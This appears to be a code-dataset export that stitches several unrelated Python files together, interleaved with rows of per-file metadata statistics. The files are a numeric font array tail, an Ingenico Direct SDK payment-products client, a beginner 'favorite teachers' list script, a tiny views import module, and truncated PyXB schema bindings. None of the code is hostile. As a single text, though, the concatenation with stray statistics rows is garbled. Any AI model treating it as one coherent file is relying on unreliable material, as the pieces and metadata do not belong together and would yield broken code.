(8,6,9,9,8,9,8,9,6,7,9,8,9,8,6,9,5,8,8,9,9,9,8,8,9,8,8,9,9,6,6,9,8,6,9,7,8,8,9,6,7,9,7,7,5,8,9,5,9,8,9,8,9,4,4,9,6,8,9,5,7,9,0,5,9,8,9,9,9,9,9,7,8,6,7,9,8,8,9,7,9,8,9,7,9,8,9,8,8,7,9,9,7,9,5,),
(7,5,8,8,7,8,7,8,5,6,8,7,8,7,5,8,4,7,7,8,8,8,7,7,8,7,7,8,8,5,5,8,7,5,8,6,7,7,8,5,6,8,6,6,4,7,8,4,8,7,8,7,8,3,3,8,5,7,8,4,6,8,0,4,8,7,8,8,8,8,8,6,7,5,6,8,7,7,8,6,8,7,8,6,8,7,8,7,7,6,8,8,6,8,4,),
(8,6,8,9,7,9,8,9,6,5,9,7,9,8,6,9,4,8,8,9,9,9,8,8,8,7,7,9,9,5,6,9,8,5,9,5,8,8,9,6,7,9,7,7,5,8,9,5,9,7,9,7,9,4,4,9,5,7,9,5,7,9,0,5,9,8,9,9,9,9,9,7,8,6,7,9,8,8,9,7,9,7,9,7,9,7,8,7,7,6,9,9,7,9,5,),
(9,10,10,10,10,9,10,9,8,9,9,8,9,9,8,9,6,9,10,10,10,9,10,10,10,9,9,9,9,10,10,9,8,10,9,10,9,9,9,9,8,8,8,8,10,8,9,10,9,8,10,10,9,7,8,8,10,9,10,9,8,8,0,7,9,8,9,9,9,10,9,9,10,9,8,9,9,9,9,10,9,8,9,9,9,9,9,8,9,9,9,10,8,8,10,),
(8,6,9,9,9,6,8,9,6,8,4,7,4,8,4,9,4,6,7,7,9,9,6,8,9,9,9,8,9,4,7,9,7,5,9,8,8,8,9,6,7,4,7,7,5,4,9,5,9,7,7,9,9,5,5,4,3,5,9,6,7,7,0,5,9,8,8,8,8,8,9,7,8,6,7,8,8,8,8,8,8,8,9,8,9,9,9,8,9,7,8,9,7,6,5,),
(5,2,5,5,5,5,4,5,3,4,2,5,2,5,4,5,3,5,5,3,5,5,4,4,5,5,5,4,5,4,3,5,5,3,5,4,5,4,5,2,5,5,5,5,3,5,5,3,5,5,5,5,5,1,1,5,3,5,5,2,4,4,0,1,5,5,4,4,5,4,5,4,5,3,5,5,5,5,4,4,4,4,5,4,5,5,5,5,5,5,4,5,5,4,1,),
(6,6,6,6,6,6,6,6,4,4,3,6,3,6,4,5,3,6,6,6,6,5,6,6,6,6,6,3,6,4,6,5,6,5,6,6,5,5,5,3,5,6,5,5,5,6,5,6,5,6,6,6,6,3,3,6,5,6,6,4,4,6,0,2,6,6,6,6,6,6,5,5,5,3,5,6,5,5,6,4,6,4,5,4,6,3,3,6,3,5,5,6,5,6,5,),
(7,5,7,8,8,7,7,7,7,8,7,7,7,7,7,7,5,7,7,7,8,7,6,8,8,8,8,7,7,6,7,7,7,5,7,8,7,8,7,5,7,7,7,7,5,7,8,5,8,7,7,8,7,4,4,7,5,7,8,5,8,7,0,4,7,7,7,7,7,8,8,8,8,7,7,8,8,8,7,6,7,8,7,8,7,7,7,7,7,8,7,8,7,7,4,),
(8,8,9,9,9,8,8,9,6,9,9,7,9,8,5,9,4,7,8,9,9,9,8,9,9,9,9,9,9,6,8,9,7,7,9,9,8,8,9,6,7,8,7,7,7,7,9,8,9,7,8,9,9,5,5,8,7,7,9,6,7,8,0,5,9,8,9,9,9,9,9,8,9,7,7,8,9,9,9,8,9,8,9,9,9,9,9,8,9,8,9,9,7,8,7,),
(14,14,15,15,15,14,14,15,12,15,14,13,14,14,11,15,10,13,14,14,15,15,14,15,15,15,15,15,15,12,14,15,13,13,15,15,14,14,15,12,13,14,13,13,13,13,15,14,15,13,14,15,15,11,11,13,13,13,15,12,13,13,4,11,15,14,15,15,14,15,15,14,15,13,13,14,15,15,15,14,15,14,15,15,15,15,15,14,15,14,15,15,13,14,13,),
(9,6,7,9,8,9,8,9,7,8,5,9,5,9,7,8,6,9,9,5,9,8,8,8,8,9,9,6,7,7,7,7,9,7,8,8,8,8,8,6,8,9,8,8,6,9,8,6,8,9,9,8,8,4,4,9,7,9,9,5,7,5,0,5,9,9,8,8,9,8,7,7,8,6,8,9,8,8,8,7,8,7,8,8,9,7,7,9,7,8,8,9,8,5,5,),
(7,8,8,8,8,7,8,8,6,8,7,6,7,7,3,8,3,7,7,8,8,8,8,8,8,8,8,7,8,6,8,8,6,7,8,8,7,7,8,5,6,6,6,6,7,5,8,8,8,6,8,8,8,5,5,6,7,7,8,6,6,6,0,4,8,7,7,7,7,8,8,7,8,6,6,7,8,8,7,7,7,7,8,8,8,8,8,7,8,7,7,8,6,6,7,),
(8,5,7,8,8,7,7,8,6,8,6,8,6,8,7,8,5,8,8,6,8,7,7,8,8,8,8,7,7,6,7,8,8,6,8,8,7,7,8,6,7,8,7,7,5,8,8,5,8,8,7,8,8,4,4,8,6,8,8,5,7,5,0,4,8,8,7,7,7,8,7,7,8,7,7,8,8,8,7,7,7,7,8,8,8,8,7,8,8,7,7,8,7,5,4,),
(5,6,4,5,5,5,6,4,5,5,3,5,3,5,4,3,6,5,6,6,6,3,6,5,5,5,5,2,3,4,6,3,4,6,3,3,6,6,3,3,5,4,6,5,6,4,4,6,4,6,6,2,4,6,6,4,6,5,6,5,4,3,0,5,5,4,3,3,3,6,4,5,6,3,5,5,5,5,3,3,3,3,4,4,3,2,2,4,2,5,5,6,6,3,6,),
(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,),
(4,4,4,4,4,4,4,5,3,3,3,4,3,4,2,5,4,4,4,4,4,5,4,4,4,4,4,5,3,4,4,5,4,4,5,4,4,4,5,2,3,4,4,3,4,4,5,4,5,4,4,4,5,4,4,4,4,4,5,3,3,3,0,3,5,4,5,5,4,4,5,3,4,2,3,4,4,4,5,3,5,3,5,3,4,3,3,4,3,3,5,5,4,3,4,),
(10,8,10,9,8,10,10,11,8,4,11,9,11,10,7,11,6,8,10,11,9,11,9,9,10,9,9,11,9,3,8,11,8,7,11,7,10,10,11,8,9,10,9,9,7,8,11,7,11,9,10,6,11,6,6,9,4,7,11,7,9,10,0,7,11,10,11,11,11,11,11,9,10,8,9,10,10,10,11,9,11,9,11,9,10,9,8,8,9,6,11,11,9,10,7,),
(3,4,3,4,3,3,4,3,3,3,0,2,0,3,0,2,4,3,4,4,4,2,4,4,3,2,2,0,0,4,4,1,0,4,2,3,4,4,2,1,3,0,4,3,4,1,2,4,3,4,4,3,3,4,4,1,4,2,4,3,2,0,0,3,0,2,0,0,0,4,0,3,4,1,2,3,0,2,0,0,0,0,0,2,0,0,0,0,0,2,3,4,4,0,4,),
)
# End of font
| 31.296148
| 291
| 0.378241
| 14,922
| 77,990
| 1.976411
| 0.023187
| 0.311135
| 0.395497
| 0.446494
| 0.752102
| 0.640852
| 0.531195
| 0.434898
| 0.3642
| 0.303811
| 0
| 0.477624
| 0.41981
| 77,990
| 2,491
| 292
| 31.308711
| 0.174103
| 0.29173
| 0
| 0.798866
| 1
| 0
| 0.000227
| 0
| 0
| 0
| 0.242644
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2d9b0e5e2cc43e83c0fcf917c67f7873ea2b1d61
| 9,543
|
py
|
Python
|
ingenico/direct/sdk/merchant/products/products_client.py
|
Ingenico/direct-sdk-python2
|
1c5c08fe2281aa99bfe8e8e031071600cb3be11d
|
[
"Apache-2.0"
] | null | null | null |
ingenico/direct/sdk/merchant/products/products_client.py
|
Ingenico/direct-sdk-python2
|
1c5c08fe2281aa99bfe8e8e031071600cb3be11d
|
[
"Apache-2.0"
] | null | null | null |
ingenico/direct/sdk/merchant/products/products_client.py
|
Ingenico/direct-sdk-python2
|
1c5c08fe2281aa99bfe8e8e031071600cb3be11d
|
[
"Apache-2.0"
] | null | null | null |
#
# This class was auto-generated from the API references found at
# https://support.direct.ingenico.com/documentation/api/reference/
#
from ingenico.direct.sdk.api_resource import ApiResource
from ingenico.direct.sdk.response_exception import ResponseException
from ingenico.direct.sdk.domain.error_response import ErrorResponse
from ingenico.direct.sdk.domain.get_payment_products_response import GetPaymentProductsResponse
from ingenico.direct.sdk.domain.payment_product import PaymentProduct
from ingenico.direct.sdk.domain.payment_product_networks_response import PaymentProductNetworksResponse
from ingenico.direct.sdk.domain.product_directory import ProductDirectory
from ingenico.direct.sdk.merchant.products.i_products_client import IProductsClient
class ProductsClient(ApiResource, IProductsClient):
"""
Products client. Thread-safe.
"""
def __init__(self, parent, path_context):
"""
:param parent: :class:`ingenico.direct.sdk.api_resource.ApiResource`
:param path_context: dict[str, str]
"""
super(ProductsClient, self).__init__(parent, path_context)
def get_payment_products(self, query, context=None):
"""
Resource /v2/{merchantId}/products - Get payment products
See also https://support.direct.ingenico.com/documentation/api/reference#operation/GetPaymentProducts
:param query: :class:`ingenico.direct.sdk.merchant.products.get_payment_products_params.GetPaymentProductsParams`
:param context: :class:`ingenico.direct.sdk.call_context.CallContext`
:return: :class:`ingenico.direct.sdk.domain.get_payment_products_response.GetPaymentProductsResponse`
:raise: ValidationException if the request was not correct and couldn't be processed (HTTP status code 400)
:raise: AuthorizationException if the request was not allowed (HTTP status code 403)
:raise: ReferenceException if an object was attempted to be referenced that doesn't exist or has been removed,
or there was a conflict (HTTP status code 404, 409 or 410)
:raise: DirectException if something went wrong at the Ingenico ePayments platform,
the Ingenico ePayments platform was unable to process a message from a downstream partner/acquirer,
or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
:raise: ApiException if the Ingenico ePayments platform returned any other error
"""
uri = self._instantiate_uri("/v2/{merchantId}/products", None)
try:
return self._communicator.get(
uri,
self._client_headers,
query,
GetPaymentProductsResponse,
context)
except ResponseException as e:
error_type = ErrorResponse
error_object = self._communicator.marshaller.unmarshal(e.body, error_type)
raise self._create_exception(e.status_code, e.body, error_object, context)
def get_payment_product(self, payment_product_id, query, context=None):
"""
Resource /v2/{merchantId}/products/{paymentProductId} - Get payment product
See also https://support.direct.ingenico.com/documentation/api/reference#operation/GetPaymentProduct
:param payment_product_id: int
:param query: :class:`ingenico.direct.sdk.merchant.products.get_payment_product_params.GetPaymentProductParams`
:param context: :class:`ingenico.direct.sdk.call_context.CallContext`
:return: :class:`ingenico.direct.sdk.domain.payment_product.PaymentProduct`
:raise: ValidationException if the request was not correct and couldn't be processed (HTTP status code 400)
:raise: AuthorizationException if the request was not allowed (HTTP status code 403)
:raise: ReferenceException if an object was attempted to be referenced that doesn't exist or has been removed,
or there was a conflict (HTTP status code 404, 409 or 410)
:raise: DirectException if something went wrong at the Ingenico ePayments platform,
the Ingenico ePayments platform was unable to process a message from a downstream partner/acquirer,
or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
:raise: ApiException if the Ingenico ePayments platform returned any other error
"""
path_context = {
"paymentProductId": str(payment_product_id),
}
uri = self._instantiate_uri("/v2/{merchantId}/products/{paymentProductId}", path_context)
try:
return self._communicator.get(
uri,
self._client_headers,
query,
PaymentProduct,
context)
except ResponseException as e:
error_type = ErrorResponse
error_object = self._communicator.marshaller.unmarshal(e.body, error_type)
raise self._create_exception(e.status_code, e.body, error_object, context)
def get_product_directory(self, payment_product_id, query, context=None):
"""
Resource /v2/{merchantId}/products/{paymentProductId}/directory - Get payment product directory
See also https://support.direct.ingenico.com/documentation/api/reference#operation/GetProductDirectoryApi
:param payment_product_id: int
:param query: :class:`ingenico.direct.sdk.merchant.products.get_product_directory_params.GetProductDirectoryParams`
:param context: :class:`ingenico.direct.sdk.call_context.CallContext`
:return: :class:`ingenico.direct.sdk.domain.product_directory.ProductDirectory`
:raise: ValidationException if the request was not correct and couldn't be processed (HTTP status code 400)
:raise: AuthorizationException if the request was not allowed (HTTP status code 403)
:raise: ReferenceException if an object was attempted to be referenced that doesn't exist or has been removed,
or there was a conflict (HTTP status code 404, 409 or 410)
:raise: DirectException if something went wrong at the Ingenico ePayments platform,
the Ingenico ePayments platform was unable to process a message from a downstream partner/acquirer,
or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
:raise: ApiException if the Ingenico ePayments platform returned any other error
"""
path_context = {
"paymentProductId": str(payment_product_id),
}
uri = self._instantiate_uri("/v2/{merchantId}/products/{paymentProductId}/directory", path_context)
try:
return self._communicator.get(
uri,
self._client_headers,
query,
ProductDirectory,
context)
except ResponseException as e:
error_type = ErrorResponse
error_object = self._communicator.marshaller.unmarshal(e.body, error_type)
raise self._create_exception(e.status_code, e.body, error_object, context)
def get_payment_product_networks(self, payment_product_id, query, context=None):
"""
Resource /v2/{merchantId}/products/{paymentProductId}/networks - Get payment product networks
See also https://support.direct.ingenico.com/documentation/api/reference#operation/GetPaymentProductNetworks
:param payment_product_id: int
:param query: :class:`ingenico.direct.sdk.merchant.products.get_payment_product_networks_params.GetPaymentProductNetworksParams`
:param context: :class:`ingenico.direct.sdk.call_context.CallContext`
:return: :class:`ingenico.direct.sdk.domain.payment_product_networks_response.PaymentProductNetworksResponse`
:raise: ValidationException if the request was not correct and couldn't be processed (HTTP status code 400)
:raise: AuthorizationException if the request was not allowed (HTTP status code 403)
:raise: ReferenceException if an object was attempted to be referenced that doesn't exist or has been removed,
or there was a conflict (HTTP status code 404, 409 or 410)
:raise: DirectException if something went wrong at the Ingenico ePayments platform,
the Ingenico ePayments platform was unable to process a message from a downstream partner/acquirer,
or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
:raise: ApiException if the Ingenico ePayments platform returned any other error
"""
path_context = {
"paymentProductId": str(payment_product_id),
}
uri = self._instantiate_uri("/v2/{merchantId}/products/{paymentProductId}/networks", path_context)
try:
return self._communicator.get(
uri,
self._client_headers,
query,
PaymentProductNetworksResponse,
context)
except ResponseException as e:
error_type = ErrorResponse
error_object = self._communicator.marshaller.unmarshal(e.body, error_type)
raise self._create_exception(e.status_code, e.body, error_object, context)
| 57.487952
| 136
| 0.693807
| 1,085
| 9,543
| 5.97788
| 0.141935
| 0.045328
| 0.055042
| 0.044095
| 0.836263
| 0.811903
| 0.803423
| 0.78338
| 0.752852
| 0.752852
| 0
| 0.014272
| 0.236404
| 9,543
| 165
| 137
| 57.836364
| 0.875806
| 0.554019
| 0
| 0.638889
| 1
| 0
| 0.060443
| 0.047491
| 0
| 0
| 0
| 0
| 0
| 1
| 0.069444
| false
| 0
| 0.111111
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2da9a9aa6872adbb1b86902149cef19d1397d81e
| 2,539
|
py
|
Python
|
Favorite_Teacher/main.py
|
RobertElias/PythonProjects
|
9dcf24bdd6b31ad94cfab6cf81caf7fdc0f8023a
|
[
"MIT"
] | null | null | null |
Favorite_Teacher/main.py
|
RobertElias/PythonProjects
|
9dcf24bdd6b31ad94cfab6cf81caf7fdc0f8023a
|
[
"MIT"
] | null | null | null |
Favorite_Teacher/main.py
|
RobertElias/PythonProjects
|
9dcf24bdd6b31ad94cfab6cf81caf7fdc0f8023a
|
[
"MIT"
] | null | null | null |
print("Welcome to the Favorite Teachers Program")
fav_teachers = []
#Get user input
fav_teachers.append(input("Who is your first favorite teacher: ").title())
fav_teachers.append(input("Who is your second favorite teacher: ").title())
fav_teachers.append(input("Who is your third favorite teacher: ").title())
fav_teachers.append(input("Who is your fourth favorite teacher: ").title())
#Summary of list
print("\nYour favorite teachers ranked are: " + str(fav_teachers))
print("You favorite teachers alphabetically are: " + str(sorted(fav_teachers)))
print("You favorite teachers in reverse are: " + str(sorted(fav_teachers, reverse=True)))
print("\nYour top Two favorite teachers are: " + fav_teachers[0] + " and " + fav_teachers[1] + ".")
print("Your next two favorite teachers are: " + fav_teachers[2] + " and " + fav_teachers[3] + ".")
print("Your last favorite teachers is: " + fav_teachers[-1])
print("You have a total of: " + str(len(fav_teachers)) + " favorite teachers.")
#Insert a new favorite teacher
fav_teachers.insert(0, input("\nOops, " + fav_teachers[0] + " is no longer you first favorite teacher. Who is your new Favorite Teacher: ").title())
#Summary of list
print("\nYour favorite teachers ranked are: " + str(fav_teachers))
print("You favorite teachers alphabetically are: " + str(sorted(fav_teachers)))
print("You favorite teachers in reverse are: " +
str(sorted(fav_teachers, reverse=True)))
print("\nYour top Two favorite teachers are: " +
fav_teachers[0] + " and " + fav_teachers[1] + ".")
print("Your next two favorite teachers are: " +
fav_teachers[2] + " and " + fav_teachers[3] + ".")
print("Your last favorite teachers is: " + fav_teachers[-1])
print("You have a total of: " + str(len(fav_teachers)) + " favorite teachers.")
#Remove a specific teacher
fav_teachers.remove(input("\nYou decide you no longer like a teacher. Who do we remove form the list: ").title())
#Summary of list
print("\nYour favorite teachers ranked are: " + str(fav_teachers))
print("You favorite teachers alphabetically are: " + str(sorted(fav_teachers)))
print("You favorite teachers in reverse are: " +
str(sorted(fav_teachers, reverse=True)))
print("\nYour top Two favorite teachers are: " +
fav_teachers[0] + " and " + fav_teachers[1] + ".")
print("Your next two favorite teachers are: " +
fav_teachers[2] + " and " + fav_teachers[3] + ".")
print("Your last favorite teachers is: " + fav_teachers[-1])
print("You have a total of: " + str(len(fav_teachers)) + " favorite teachers.")
| 45.339286
| 148
| 0.705002
| 360
| 2,539
| 4.875
| 0.166667
| 0.219373
| 0.054701
| 0.064957
| 0.831339
| 0.831339
| 0.831339
| 0.813675
| 0.813675
| 0.813675
| 0
| 0.007892
| 0.151635
| 2,539
| 55
| 149
| 46.163636
| 0.806871
| 0.044506
| 0
| 0.685714
| 0
| 0
| 0.484711
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.628571
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
2da9f101a86a0287688cb22d3a503cd73161d7ea
| 67
|
py
|
Python
|
meetup/views/__init__.py
|
BradleyKirton/gpug-graphql
|
ebcd53e48773801d3908d11bcc4c039a259dc04b
|
[
"MIT"
] | null | null | null |
meetup/views/__init__.py
|
BradleyKirton/gpug-graphql
|
ebcd53e48773801d3908d11bcc4c039a259dc04b
|
[
"MIT"
] | 3
|
2020-06-05T18:19:29.000Z
|
2021-06-10T20:23:21.000Z
|
meetup/views/__init__.py
|
BradleyKirton/gpug-graphql
|
ebcd53e48773801d3908d11bcc4c039a259dc04b
|
[
"MIT"
] | null | null | null |
from meetup.views.api import *
from meetup.views.template import *
| 22.333333
| 35
| 0.791045
| 10
| 67
| 5.3
| 0.6
| 0.377358
| 0.566038
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119403
| 67
| 2
| 36
| 33.5
| 0.898305
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2df6380e95f4b2a8ceac071ba64f386ca9dbd03c
| 249,372
|
py
|
Python
|
metarecord/binding/jhs.py
|
kerkkoheiskanen/helerm
|
bdaf801a940d42325a1076b42bb0edef831fbac9
|
[
"MIT"
] | 2
|
2017-04-21T15:36:23.000Z
|
2020-12-04T09:32:39.000Z
|
metarecord/binding/jhs.py
|
kerkkoheiskanen/helerm
|
bdaf801a940d42325a1076b42bb0edef831fbac9
|
[
"MIT"
] | 168
|
2016-10-05T12:58:41.000Z
|
2021-08-31T14:29:56.000Z
|
metarecord/binding/jhs.py
|
kerkkoheiskanen/helerm
|
bdaf801a940d42325a1076b42bb0edef831fbac9
|
[
"MIT"
] | 7
|
2016-10-13T12:51:36.000Z
|
2021-01-21T13:05:04.000Z
|
# ./metarecord/binding/jhs.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:0bcf4fe07fa483312851437fc9b3f33582a4d3fa
# Generated 2020-04-06 06:44:21.533676 by PyXB version 1.2.6 using Python 3.6.10.final.0
# Namespace http://skeemat.jhs-suositukset.fi/tos/2015/01/15
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:0bd4d60e-77d2-11ea-a270-0242c0a80003')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.6'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# A holder for module-level binding classes so we can access them from
# inside class definitions where property names may conflict.
_module_typeBindings = pyxb.utils.utility.Object()
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
import metarecord.binding._jhs as _ImportedBinding_metarecord_binding__jhs
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://skeemat.jhs-suositukset.fi/tos/2015/01/15', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
"""Parse the given XML and use the document element to create a
Python instance.
@param xml_text An XML document. This should be data (Python 2
str or Python 3 bytes), or a text (Python 2 unicode or Python 3
str) in the L{pyxb._InputEncoding} encoding.
@keyword default_namespace The L{pyxb.Namespace} instance to use as the
default namespace where there is no default namespace in scope.
If unspecified or C{None}, the namespace of the module containing
this function will be used.
@keyword location_base: An object to be recorded as the base of all
L{pyxb.utils.utility.Location} instances associated with events and
objects handled by the parser. You might pass the URI from which
the document was obtained.
"""
if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
dom = pyxb.utils.domutils.StringToDOM(xml_text)
return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
handler = saxer.getContentHandler()
xmld = xml_text
if isinstance(xmld, _six.text_type):
xmld = xmld.encode(pyxb._InputEncoding)
saxer.parse(io.BytesIO(xmld))
instance = handler.rootObject()
return instance
def CreateFromDOM (node, default_namespace=None):
"""Create a Python instance from the given DOM node.
The node tag must correspond to an element declaration in this module.
@deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}idTyyppi
class idTyyppi (pyxb.binding.datatypes.string):
"""Rakenneosan yksilöivä id-tunnus. Formaattia ei ole määritelty."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'idTyyppi')
_XSDLocation = None
_Documentation = 'Rakenneosan yksilöivä id-tunnus. Formaattia ei ole määritelty.'
idTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'idTyyppi', idTyyppi)
_module_typeBindings.idTyyppi = idTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kieliKoodiTyyppi
class kieliKoodiTyyppi (pyxb.binding.datatypes.string):
"""Kielikoodin avulla elementti voi ilmetä usealla eri kielellä. Suositellaan käytettäväksi standardeja kielikoodeja (fi, se, en). """
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'kieliKoodiTyyppi')
_XSDLocation = None
_Documentation = 'Kielikoodin avulla elementti voi ilmetä usealla eri kielellä. Suositellaan käytettäväksi standardeja kielikoodeja (fi, se, en).\t\t'
kieliKoodiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'kieliKoodiTyyppi', kieliKoodiTyyppi)
_module_typeBindings.kieliKoodiTyyppi = kieliKoodiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}tilaKoodiTyyppi
class tilaKoodiTyyppi (pyxb.binding.datatypes.integer, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'tilaKoodiTyyppi')
_XSDLocation = None
_Documentation = None
tilaKoodiTyyppi._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=tilaKoodiTyyppi, enum_prefix=None)
tilaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='1', tag=None)
tilaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='2', tag=None)
tilaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='3', tag=None)
tilaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='4', tag=None)
tilaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='5', tag=None)
tilaKoodiTyyppi._InitializeFacetMap(tilaKoodiTyyppi._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'tilaKoodiTyyppi', tilaKoodiTyyppi)
_module_typeBindings.tilaKoodiTyyppi = tilaKoodiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}versioTyyppi
class versioTyyppi (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'versioTyyppi')
_XSDLocation = None
_Documentation = None
versioTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'versioTyyppi', versioTyyppi)
_module_typeBindings.versioTyyppi = versioTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}luokitustunnusTyyppi
class luokitustunnusTyyppi (pyxb.binding.datatypes.string):
"""Käytettäessä julkisen hallinnon yhteisiä luokituksia, tunnuksena pitää käyttää yhteisen luokituksen mukaista tunnusta."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'luokitustunnusTyyppi')
_XSDLocation = None
_Documentation = 'Käytettäessä julkisen hallinnon yhteisiä luokituksia, tunnuksena pitää käyttää yhteisen luokituksen mukaista tunnusta.'
luokitustunnusTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'luokitustunnusTyyppi', luokitustunnusTyyppi)
_module_typeBindings.luokitustunnusTyyppi = luokitustunnusTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}nimekeTekstiTyyppi
class nimekeTekstiTyyppi (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'nimekeTekstiTyyppi')
_XSDLocation = None
_Documentation = None
nimekeTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'nimekeTekstiTyyppi', nimekeTekstiTyyppi)
_module_typeBindings.nimekeTekstiTyyppi = nimekeTekstiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kuvausTekstiTyyppi
class kuvausTekstiTyyppi (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'kuvausTekstiTyyppi')
_XSDLocation = None
_Documentation = None
kuvausTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'kuvausTekstiTyyppi', kuvausTekstiTyyppi)
_module_typeBindings.kuvausTekstiTyyppi = kuvausTekstiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}lisatiedotTekstiTyyppi
class lisatiedotTekstiTyyppi (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'lisatiedotTekstiTyyppi')
_XSDLocation = None
_Documentation = None
lisatiedotTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'lisatiedotTekstiTyyppi', lisatiedotTekstiTyyppi)
_module_typeBindings.lisatiedotTekstiTyyppi = lisatiedotTekstiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}julkisuusluokkaKoodiTyyppi
class julkisuusluokkaKoodiTyyppi (pyxb.binding.datatypes.integer, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'julkisuusluokkaKoodiTyyppi')
_XSDLocation = None
_Documentation = None
julkisuusluokkaKoodiTyyppi._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=julkisuusluokkaKoodiTyyppi, enum_prefix=None)
julkisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='1', tag=None)
julkisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='2', tag=None)
